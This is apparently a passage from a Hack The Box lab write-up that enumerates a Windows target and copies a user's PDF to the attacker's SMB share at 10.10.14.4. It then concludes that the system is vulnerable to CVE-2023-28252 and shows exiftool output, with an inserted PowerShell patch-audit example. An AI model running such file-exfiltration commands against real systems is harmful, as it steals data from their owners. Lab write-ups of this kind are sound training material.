PDF Document


ps c:\Users\sam.emerson\Documents> ls
    directory: C:\Users\sam.emerson\Documents
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/21/2023   9:18 AM          14158 CVE-2023-28252_Summary.pdf
-a----         9/26/2023   1:06 PM           1113 watchdog.ps1

Upon completing basic enumeration, I have come across a PDF file located in the home directory of the sam.emerson user.

ps c:\Users\sam.emerson\Documents> copy .\CVE-2023-28252_Summary.pdf \\10.10.14.4\test\

I will transfer the PDF file to the Windows host over the existing SMB.

CVE-2023-28252_Summary.pdf


The PDF file goes over a local privilege escalation vulnerability, CVE-2023-28252, that targets the Windows Common Log File System (CLFS) driver. Given that the PDF file was on the target system, the target system might be vulnerable to it.

Checking the MSRC entry for the vulnerability reveals the updates that address it, and they are NOT included in those 7 hotfixes. This makes the target system vulnerable to it. Moving on to the Privilege Escalation phase for CVE-2023-28252 (https://nvd.nist.gov/vuln/detail/CVE-2023-28252).
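The hotfix comparison above can be scripted as a patch audit. This is an added example, not part of the original notes: it also compares the OS build revision (UBR), because a later cumulative update supersedes the KB that MSRC lists, so a missing KB alone is not conclusive. The function name, the KB ID and the fixed build/revision values are placeholders to be filled in from the MSRC entry.

```powershell
# Added example: patch-presence audit for a single CVE.
# 'KB0000000' and the fixed build/revision are PLACEHOLDERS; take the real
# values from the MSRC entry that matches the audited OS version.
function Test-CvePatched {
    param(
        [string[]]$InstalledKbs,   # e.g. (Get-HotFix).HotFixID
        [string[]]$FixingKbs,      # KBs MSRC lists for this OS version
        [int]$CurrentBuild,        # e.g. CurrentBuildNumber from the registry
        [int]$CurrentRevision,     # UBR (update build revision)
        [int]$FixedBuild,          # build the fixed revision applies to
        [int]$FixedRevision        # first revision that contains the fix
    )

    # 1. Direct match: one of the fixing KBs is installed.
    $hit = @($InstalledKbs | Where-Object { $FixingKbs -contains $_ })
    if ($hit.Count -gt 0) {
        return [pscustomobject]@{ Patched = $true
            Reason = "Fixing KB installed: $($hit -join ', ')" }
    }

    # 2. The fixed revision was looked up for another build: no verdict.
    if ($CurrentBuild -ne $FixedBuild) {
        return [pscustomobject]@{ Patched = $null
            Reason = "Fixed revision is for build $FixedBuild, host is $CurrentBuild" }
    }

    # 3. Same build: a newer cumulative update carries the fix even though
    #    the original KB no longer appears in the hotfix list.
    if ($CurrentRevision -ge $FixedRevision) {
        return [pscustomobject]@{ Patched = $true
            Reason = "Revision $CurrentRevision >= fixed revision $FixedRevision" }
    }

    [pscustomobject]@{ Patched = $false
        Reason = "No fixing KB and revision $CurrentRevision < $FixedRevision" }
}

# Live values from the host being audited.
$cv = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
Test-CvePatched -InstalledKbs (Get-HotFix).HotFixID `
    -FixingKbs @('KB0000000') `
    -CurrentBuild ([int]$cv.CurrentBuildNumber) -CurrentRevision $cv.UBR `
    -FixedBuild 0 -FixedRevision 0   # placeholders: fill in from MSRC
```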

Metadata


┌──(kali㉿kali)-[~/archive/htb/labs/aero]
└─$ exiftool CVE-2023-28252_Summary.pdf             
exiftool version number         : 12.67
file name                       : CVE-2023-28252_Summary.pdf
directory                       : .
file size                       : 14 kB
file modification date/time     : 2023:09:21 23:58:09+02:00
file access date/time           : 2024:01:16 13:25:27+01:00
file inode change date/time     : 2024:01:16 13:25:42+01:00
file permissions                : -rwxr-xr-x
file type                       : PDF
file type extension             : pdf
mime type                       : application/pdf
pdf version                     : 1.6
linearized                      : No
page count                      : 1
language                        : en-US
creator                         : Writer
producer                        : LibreOffice 7.4
create date                     : 2023:09:21 18:18:14+02:00